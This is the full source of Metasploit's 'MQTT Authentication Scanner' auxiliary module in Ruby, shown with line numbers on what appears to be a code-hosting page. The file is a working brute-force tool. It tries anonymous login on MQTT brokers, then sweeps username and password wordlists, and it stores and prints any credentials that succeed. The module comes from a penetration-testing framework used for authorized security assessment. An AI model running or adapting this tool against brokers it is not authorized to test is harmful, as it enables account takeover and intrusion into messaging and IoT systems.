Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/mqtt'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Auxiliary::Scanner
12
  include Msf::Auxiliary::MQTT
13
  include Msf::Auxiliary::Report
14
  include Msf::Auxiliary::AuthBrute
15

16
  def initialize
17
    super(
18
      'Name'        => 'MQTT Authentication Scanner',
19
      'Description' => %q(
20
        This module attempts to authenticate to MQTT.
21
      ),
22
      'Author'      =>
23
        [
24
          'Jon Hart <jon_hart[at]rapid7.com>'
25
        ],
26
      'References'     =>
27
        [
28
          ['URL', 'http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Table_3.1_-']
29
        ],
30
      'License'     => MSF_LICENSE,
31
      'DefaultOptions' =>
32
        {
33
          'BLANK_PASSWORDS' => false,
34
          'USER_AS_PASS' => true,
35
          'USER_FILE' => 'data/wordlists/unix_users.txt',
36
          'PASS_FILE' => 'data/wordlists/unix_passwords.txt'
37
        }
38
    )
39
  end
40

41
  def test_login(username, password)
42
    client_opts = {
43
      username: username,
44
      password: password,
45
      read_timeout: read_timeout,
46
      client_id: client_id
47
    }
48
    connect
49
    client = Rex::Proto::MQTT::Client.new(sock, client_opts)
50
    connect_res = client.connect
51
    client.disconnect
52
    connect_res.return_code.zero?
53
  end
54

55
  def default_login
56
    vprint_status("Testing without credentials")
57
    if test_login('', '')
58
      print_good("Does not require authentication")
59
    end
60

61
  end
62

63
  def run_host(_ip)
64
    unless default_login
65
      brute
66
    end
67
  end
68

69
  def brute
70
    vprint_status("Starting MQTT login sweep")
71
    cred_collection = build_credential_collection(
72
      username: datastore['USERNAME'],
73
      password: datastore['PASSWORD']
74
    )
75

76
    scanner = Metasploit::Framework::LoginScanner::MQTT.new(
77
      configure_login_scanner(
78
        host: rhost,
79
        port: rport,
80
        read_timeout: datastore['READ_TIMEOUT'],
81
        client_id: client_id,
82
        proxies: datastore['PROXIES'],
83
        cred_details: cred_collection,
84
        stop_on_success: datastore['STOP_ON_SUCCESS'],
85
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
86
        connection_timeout: datastore['ConnectTimeout'],
87
        max_send_size: datastore['TCP::max_send_size'],
88
        send_delay: datastore['TCP::send_delay'],
89
        framework: framework,
90
        framework_module: self,
91
        ssl: datastore['SSL'],
92
        ssl_version: datastore['SSLVersion'],
93
        ssl_verify_mode: datastore['SSLVerifyMode'],
94
        ssl_cipher: datastore['SSLCipher'],
95
        local_port: datastore['CPORT'],
96
        local_host: datastore['CHOST']
97
      )
98
    )
99

100
    scanner.scan! do |result|
101
      credential_data = result.to_h
102
      credential_data.merge!(
103
        module_fullname: fullname,
104
        workspace_id: myworkspace_id
105
      )
106
      password = result.credential.private
107
      username = result.credential.public
108
      if result.success?
109
        credential_core = create_credential(credential_data)
110
        credential_data[:core] = credential_core
111
        create_credential_login(credential_data)
112
        print_good("MQTT Login Successful: #{username}/#{password}")
113
      else
114
        invalidate_login(credential_data)
115
        vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
116
      end
117
    end
118
  end
119
end
120

121